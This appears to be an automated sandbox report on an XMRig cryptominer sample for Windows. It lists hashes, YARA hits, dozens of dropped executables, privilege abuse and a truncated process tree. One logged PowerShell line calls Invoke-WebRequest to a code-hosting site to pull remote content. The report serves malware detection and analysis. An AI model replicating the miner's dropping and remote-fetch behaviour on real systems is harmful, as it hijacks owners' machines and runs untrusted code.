xmrig | e28a959e131e4b1c621026073453e87a7317c0fe46c5f42b7338e6c6753bfacb

Analysis

max time kernel
147s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17/05/2024, 01:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
Size

2.9MB
MD5

7813339ed6c7c6649e8477d45de06b50
SHA1

01973f0848f3d78b1a3aad1c614d6bd1c0012cd0
SHA256

e28a959e131e4b1c621026073453e87a7317c0fe46c5f42b7338e6c6753bfacb
SHA512

f7d62d10bfb81de0c59aad650dd09984118ee8c347ef0e907410344424a943ede36be1f6092043cca63306684abd9ae9b487442f6726fc75abb53cf5168a542a
SSDEEP

49152:71G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0INx29L5KQ2O:71ONtyBeSFkXV1etEKLlWUTOfeiRA2RY

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/4288-0-0x00007FF7DC710000-0x00007FF7DCB06000-memory.dmp	xmrig
behavioral2/files/0x0008000000023437-7.dat	xmrig
behavioral2/files/0x000700000002343b-11.dat	xmrig
behavioral2/files/0x000700000002343d-20.dat	xmrig
behavioral2/files/0x000700000002343e-28.dat	xmrig
behavioral2/files/0x0007000000023440-39.dat	xmrig
behavioral2/files/0x0007000000023441-42.dat	xmrig
behavioral2/files/0x0007000000023442-65.dat	xmrig
behavioral2/memory/4648-68-0x00007FF72A720000-0x00007FF72AB16000-memory.dmp	xmrig
behavioral2/memory/2592-69-0x00007FF697430000-0x00007FF697826000-memory.dmp	xmrig
behavioral2/files/0x0007000000023445-73.dat	xmrig
behavioral2/files/0x0007000000023446-85.dat	xmrig
behavioral2/files/0x0007000000023447-96.dat	xmrig
behavioral2/files/0x000700000002344d-125.dat	xmrig
behavioral2/files/0x0007000000023454-155.dat	xmrig
behavioral2/files/0x0007000000023458-175.dat	xmrig
behavioral2/memory/4036-891-0x00007FF6642D0000-0x00007FF6646C6000-memory.dmp	xmrig
behavioral2/memory/2408-898-0x00007FF66BEC0000-0x00007FF66C2B6000-memory.dmp	xmrig
behavioral2/memory/3204-905-0x00007FF6B3660000-0x00007FF6B3A56000-memory.dmp	xmrig
behavioral2/memory/2692-921-0x00007FF7C62E0000-0x00007FF7C66D6000-memory.dmp	xmrig
behavioral2/memory/4932-915-0x00007FF72DE10000-0x00007FF72E206000-memory.dmp	xmrig
behavioral2/memory/1988-932-0x00007FF72DCC0000-0x00007FF72E0B6000-memory.dmp	xmrig
behavioral2/memory/1348-948-0x00007FF754CD0000-0x00007FF7550C6000-memory.dmp	xmrig
behavioral2/memory/1792-958-0x00007FF737F80000-0x00007FF738376000-memory.dmp	xmrig
behavioral2/memory/4928-955-0x00007FF789E00000-0x00007FF78A1F6000-memory.dmp	xmrig
behavioral2/memory/1824-954-0x00007FF642C40000-0x00007FF643036000-memory.dmp	xmrig
behavioral2/memory/2704-947-0x00007FF6CBC30000-0x00007FF6CC026000-memory.dmp	xmrig
behavioral2/memory/2784-944-0x00007FF7A9C80000-0x00007FF7AA076000-memory.dmp	xmrig
behavioral2/memory/5072-940-0x00007FF6D7800000-0x00007FF6D7BF6000-memory.dmp	xmrig
behavioral2/memory/1536-927-0x00007FF6B8C90000-0x00007FF6B9086000-memory.dmp	xmrig
behavioral2/memory/4772-910-0x00007FF689000000-0x00007FF6893F6000-memory.dmp	xmrig
behavioral2/files/0x000700000002345a-185.dat	xmrig
behavioral2/files/0x0007000000023459-180.dat	xmrig
behavioral2/files/0x0007000000023457-178.dat	xmrig
behavioral2/files/0x0007000000023456-173.dat	xmrig
behavioral2/files/0x0007000000023455-168.dat	xmrig
behavioral2/files/0x0007000000023453-158.dat	xmrig
behavioral2/files/0x0007000000023452-153.dat	xmrig
behavioral2/files/0x0007000000023451-148.dat	xmrig
behavioral2/files/0x0007000000023450-138.dat	xmrig
behavioral2/files/0x000700000002344f-135.dat	xmrig
behavioral2/files/0x000700000002344e-131.dat	xmrig
behavioral2/files/0x000700000002344c-118.dat	xmrig
behavioral2/files/0x000700000002344b-116.dat	xmrig
behavioral2/files/0x000700000002344a-111.dat	xmrig
behavioral2/files/0x0007000000023449-106.dat	xmrig
behavioral2/files/0x0007000000023448-101.dat	xmrig
behavioral2/files/0x0008000000023444-86.dat	xmrig
behavioral2/files/0x0008000000023443-80.dat	xmrig
behavioral2/memory/3920-67-0x00007FF67EB60000-0x00007FF67EF56000-memory.dmp	xmrig
behavioral2/memory/3648-64-0x00007FF7E0330000-0x00007FF7E0726000-memory.dmp	xmrig
behavioral2/memory/768-63-0x00007FF749F80000-0x00007FF74A376000-memory.dmp	xmrig
behavioral2/memory/3300-43-0x00007FF70A6A0000-0x00007FF70AA96000-memory.dmp	xmrig
behavioral2/memory/5012-40-0x00007FF67CD80000-0x00007FF67D176000-memory.dmp	xmrig
behavioral2/files/0x000700000002343f-37.dat	xmrig
behavioral2/memory/1528-32-0x00007FF6BD770000-0x00007FF6BDB66000-memory.dmp	xmrig
behavioral2/memory/1968-27-0x00007FF7F0100000-0x00007FF7F04F6000-memory.dmp	xmrig
behavioral2/files/0x000700000002343c-18.dat	xmrig
behavioral2/memory/768-1928-0x00007FF749F80000-0x00007FF74A376000-memory.dmp	xmrig
behavioral2/memory/1528-1929-0x00007FF6BD770000-0x00007FF6BDB66000-memory.dmp	xmrig
behavioral2/memory/1968-1930-0x00007FF7F0100000-0x00007FF7F04F6000-memory.dmp	xmrig
behavioral2/memory/3300-1931-0x00007FF70A6A0000-0x00007FF70AA96000-memory.dmp	xmrig
behavioral2/memory/3648-1932-0x00007FF7E0330000-0x00007FF7E0726000-memory.dmp	xmrig
behavioral2/memory/5012-1933-0x00007FF67CD80000-0x00007FF67D176000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	1192	powershell.exe
9	1192	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1192	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
768	aeTwrtu.exe
1968	snoSBAJ.exe
1528	XEpncSP.exe
5012	MeIPttT.exe
3648	QsgjXIP.exe
3300	UMPLaIk.exe
3920	MNUcknI.exe
4648	RzAiXfF.exe
2592	xWmlaiU.exe
4036	WFvjQWg.exe
2408	JawGfNP.exe
3204	XdhjEtO.exe
4772	MfzdQsI.exe
4932	cCYsDZO.exe
2692	ayJeXMR.exe
1536	XVddiTo.exe
1988	gcqNWPm.exe
5072	cmBRfkx.exe
2784	XvNrbMH.exe
2704	yMqilAF.exe
1348	ugeMWXf.exe
1824	yqfDRpB.exe
4928	czVgbmp.exe
1792	kNiKKjp.exe
2440	oAUviUp.exe
3172	CoRruSs.exe
4832	mdxYeNg.exe
5088	iiNKvJY.exe
4140	tOyCQMO.exe
2324	NBffoKn.exe
2556	IGUsjRi.exe
1972	trXgJpN.exe
872	klEsPaq.exe
3696	FdiPADU.exe
2392	qRdmQzB.exe
404	QFzbdnp.exe
4688	mGCYYPA.exe
4252	tTOUlEM.exe
4824	aBHmbWg.exe
4444	NzFbyFC.exe
2476	UcPQLsE.exe
4572	LlYjKgL.exe
4312	rrhALPf.exe
1924	CosdsLa.exe
4552	VBKNIIG.exe
3492	LpuVRdA.exe
4260	rHWRIvi.exe
2076	QCgNFmR.exe
2412	BYRLqbr.exe
2292	lWcZMQe.exe
3412	NoHSjqH.exe
1676	HZyCMWY.exe
4324	uHoJFYJ.exe
3324	wqFPATU.exe
1856	amTIGal.exe
364	rMXuvlk.exe
4788	BrCScRv.exe
3688	RihmJJP.exe
2568	vJJqbcY.exe
3140	omBJkGT.exe
688	FzVZuJt.exe
2220	QXxqGup.exe
3740	hUsCnOL.exe
4304	IIWJXCP.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4288-0-0x00007FF7DC710000-0x00007FF7DCB06000-memory.dmp	upx
behavioral2/files/0x0008000000023437-7.dat	upx
behavioral2/files/0x000700000002343b-11.dat	upx
behavioral2/files/0x000700000002343d-20.dat	upx
behavioral2/files/0x000700000002343e-28.dat	upx
behavioral2/files/0x0007000000023440-39.dat	upx
behavioral2/files/0x0007000000023441-42.dat	upx
behavioral2/files/0x0007000000023442-65.dat	upx
behavioral2/memory/4648-68-0x00007FF72A720000-0x00007FF72AB16000-memory.dmp	upx
behavioral2/memory/2592-69-0x00007FF697430000-0x00007FF697826000-memory.dmp	upx
behavioral2/files/0x0007000000023445-73.dat	upx
behavioral2/files/0x0007000000023446-85.dat	upx
behavioral2/files/0x0007000000023447-96.dat	upx
behavioral2/files/0x000700000002344d-125.dat	upx
behavioral2/files/0x0007000000023454-155.dat	upx
behavioral2/files/0x0007000000023458-175.dat	upx
behavioral2/memory/4036-891-0x00007FF6642D0000-0x00007FF6646C6000-memory.dmp	upx
behavioral2/memory/2408-898-0x00007FF66BEC0000-0x00007FF66C2B6000-memory.dmp	upx
behavioral2/memory/3204-905-0x00007FF6B3660000-0x00007FF6B3A56000-memory.dmp	upx
behavioral2/memory/2692-921-0x00007FF7C62E0000-0x00007FF7C66D6000-memory.dmp	upx
behavioral2/memory/4932-915-0x00007FF72DE10000-0x00007FF72E206000-memory.dmp	upx
behavioral2/memory/1988-932-0x00007FF72DCC0000-0x00007FF72E0B6000-memory.dmp	upx
behavioral2/memory/1348-948-0x00007FF754CD0000-0x00007FF7550C6000-memory.dmp	upx
behavioral2/memory/1792-958-0x00007FF737F80000-0x00007FF738376000-memory.dmp	upx
behavioral2/memory/4928-955-0x00007FF789E00000-0x00007FF78A1F6000-memory.dmp	upx
behavioral2/memory/1824-954-0x00007FF642C40000-0x00007FF643036000-memory.dmp	upx
behavioral2/memory/2704-947-0x00007FF6CBC30000-0x00007FF6CC026000-memory.dmp	upx
behavioral2/memory/2784-944-0x00007FF7A9C80000-0x00007FF7AA076000-memory.dmp	upx
behavioral2/memory/5072-940-0x00007FF6D7800000-0x00007FF6D7BF6000-memory.dmp	upx
behavioral2/memory/1536-927-0x00007FF6B8C90000-0x00007FF6B9086000-memory.dmp	upx
behavioral2/memory/4772-910-0x00007FF689000000-0x00007FF6893F6000-memory.dmp	upx
behavioral2/files/0x000700000002345a-185.dat	upx
behavioral2/files/0x0007000000023459-180.dat	upx
behavioral2/files/0x0007000000023457-178.dat	upx
behavioral2/files/0x0007000000023456-173.dat	upx
behavioral2/files/0x0007000000023455-168.dat	upx
behavioral2/files/0x0007000000023453-158.dat	upx
behavioral2/files/0x0007000000023452-153.dat	upx
behavioral2/files/0x0007000000023451-148.dat	upx
behavioral2/files/0x0007000000023450-138.dat	upx
behavioral2/files/0x000700000002344f-135.dat	upx
behavioral2/files/0x000700000002344e-131.dat	upx
behavioral2/files/0x000700000002344c-118.dat	upx
behavioral2/files/0x000700000002344b-116.dat	upx
behavioral2/files/0x000700000002344a-111.dat	upx
behavioral2/files/0x0007000000023449-106.dat	upx
behavioral2/files/0x0007000000023448-101.dat	upx
behavioral2/files/0x0008000000023444-86.dat	upx
behavioral2/files/0x0008000000023443-80.dat	upx
behavioral2/memory/3920-67-0x00007FF67EB60000-0x00007FF67EF56000-memory.dmp	upx
behavioral2/memory/3648-64-0x00007FF7E0330000-0x00007FF7E0726000-memory.dmp	upx
behavioral2/memory/768-63-0x00007FF749F80000-0x00007FF74A376000-memory.dmp	upx
behavioral2/memory/3300-43-0x00007FF70A6A0000-0x00007FF70AA96000-memory.dmp	upx
behavioral2/memory/5012-40-0x00007FF67CD80000-0x00007FF67D176000-memory.dmp	upx
behavioral2/files/0x000700000002343f-37.dat	upx
behavioral2/memory/1528-32-0x00007FF6BD770000-0x00007FF6BDB66000-memory.dmp	upx
behavioral2/memory/1968-27-0x00007FF7F0100000-0x00007FF7F04F6000-memory.dmp	upx
behavioral2/files/0x000700000002343c-18.dat	upx
behavioral2/memory/768-1928-0x00007FF749F80000-0x00007FF74A376000-memory.dmp	upx
behavioral2/memory/1528-1929-0x00007FF6BD770000-0x00007FF6BDB66000-memory.dmp	upx
behavioral2/memory/1968-1930-0x00007FF7F0100000-0x00007FF7F04F6000-memory.dmp	upx
behavioral2/memory/3300-1931-0x00007FF70A6A0000-0x00007FF70AA96000-memory.dmp	upx
behavioral2/memory/3648-1932-0x00007FF7E0330000-0x00007FF7E0726000-memory.dmp	upx
behavioral2/memory/5012-1933-0x00007FF67CD80000-0x00007FF67D176000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\eATLbUQ.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\TWzVdKx.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\JLECQop.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\NofpIec.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\PakTvus.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\FLynwyQ.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\IJutuFD.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\XDceZOu.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\GNeGxIY.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\PLDqdIm.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\HmxGvpT.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\sxUhUHR.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\gdcILEb.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\SmysHXl.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\fEJUEDS.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\fIxoOBv.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\VeVnMjD.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\bOOZccb.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\UcPQLsE.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\NEqjBqN.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\TmWTWex.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\jYKzIbx.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\TzBJACJ.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\SWiADxL.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\ZhmMSVB.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\uFQCQoj.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\EnqbnRa.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\wBdzaNx.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\ULtOLKh.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\QOFHZmc.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\MnSEMZQ.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\oJhoGEN.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\qSYdMGB.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\vbTXfow.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\TltXWGu.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\RihmJJP.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\RcZKzrT.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\NAeurLS.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\pBxDxcU.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\kKgqhxm.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\jKZUBty.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\vRROEjd.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\CosdsLa.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\uxXeDAr.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\lkoKeab.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\QVnFedT.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\NEmmZRH.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\sStQytn.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\HlnBCgS.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\IIWJXCP.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\llWAulW.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\poLHeML.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\KwBLfQu.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\MeDJVUy.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\fTBzqvm.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\zTkbYSG.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\VbRqnuw.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\rmJnSMS.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\LDoMICy.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\bYOzkhM.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\QsgjXIP.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\vNIlcBC.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\lMcmfQO.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
File created	C:\Windows\System\sKjXWpg.exe	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1192	powershell.exe
1192	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
Token: SeDebugPrivilege	1192	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4288 wrote to memory of 1192	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	84
PID 4288 wrote to memory of 1192	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	84
PID 4288 wrote to memory of 768	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	85
PID 4288 wrote to memory of 768	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	85
PID 4288 wrote to memory of 1968	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	86
PID 4288 wrote to memory of 1968	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	86
PID 4288 wrote to memory of 1528	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	87
PID 4288 wrote to memory of 1528	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	87
PID 4288 wrote to memory of 5012	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	88
PID 4288 wrote to memory of 5012	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	88
PID 4288 wrote to memory of 3648	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	89
PID 4288 wrote to memory of 3648	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	89
PID 4288 wrote to memory of 3300	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	90
PID 4288 wrote to memory of 3300	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	90
PID 4288 wrote to memory of 3920	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	91
PID 4288 wrote to memory of 3920	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	91
PID 4288 wrote to memory of 4648	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	92
PID 4288 wrote to memory of 4648	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	92
PID 4288 wrote to memory of 2592	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	93
PID 4288 wrote to memory of 2592	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	93
PID 4288 wrote to memory of 4036	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	94
PID 4288 wrote to memory of 4036	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	94
PID 4288 wrote to memory of 2408	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	95
PID 4288 wrote to memory of 2408	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	95
PID 4288 wrote to memory of 3204	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	96
PID 4288 wrote to memory of 3204	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	96
PID 4288 wrote to memory of 4772	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	97
PID 4288 wrote to memory of 4772	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	97
PID 4288 wrote to memory of 4932	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	98
PID 4288 wrote to memory of 4932	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	98
PID 4288 wrote to memory of 2692	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	99
PID 4288 wrote to memory of 2692	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	99
PID 4288 wrote to memory of 1536	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	100
PID 4288 wrote to memory of 1536	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	100
PID 4288 wrote to memory of 1988	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	101
PID 4288 wrote to memory of 1988	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	101
PID 4288 wrote to memory of 5072	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	102
PID 4288 wrote to memory of 5072	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	102
PID 4288 wrote to memory of 2784	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	103
PID 4288 wrote to memory of 2784	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	103
PID 4288 wrote to memory of 2704	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	104
PID 4288 wrote to memory of 2704	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	104
PID 4288 wrote to memory of 1348	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	105
PID 4288 wrote to memory of 1348	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	105
PID 4288 wrote to memory of 1824	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	106
PID 4288 wrote to memory of 1824	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	106
PID 4288 wrote to memory of 4928	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	107
PID 4288 wrote to memory of 4928	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	107
PID 4288 wrote to memory of 1792	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	108
PID 4288 wrote to memory of 1792	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	108
PID 4288 wrote to memory of 2440	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	109
PID 4288 wrote to memory of 2440	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	109
PID 4288 wrote to memory of 3172	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	110
PID 4288 wrote to memory of 3172	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	110
PID 4288 wrote to memory of 4832	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	111
PID 4288 wrote to memory of 4832	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	111
PID 4288 wrote to memory of 5088	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	112
PID 4288 wrote to memory of 5088	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	112
PID 4288 wrote to memory of 4140	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	113
PID 4288 wrote to memory of 4140	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	113
PID 4288 wrote to memory of 2324	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	114
PID 4288 wrote to memory of 2324	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	114
PID 4288 wrote to memory of 2556	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	115
PID 4288 wrote to memory of 2556	4288	7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe	115

C:\Users\Admin\AppData\Local\Temp\7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\7813339ed6c7c6649e8477d45de06b50_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1192" "2952" "1664" "2800" "0" "0" "2888" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:13176
- C:\Windows\System\aeTwrtu.exe
  C:\Windows\System\aeTwrtu.exe
  2⤵
  - Executes dropped EXE
  PID:768
- C:\Windows\System\snoSBAJ.exe
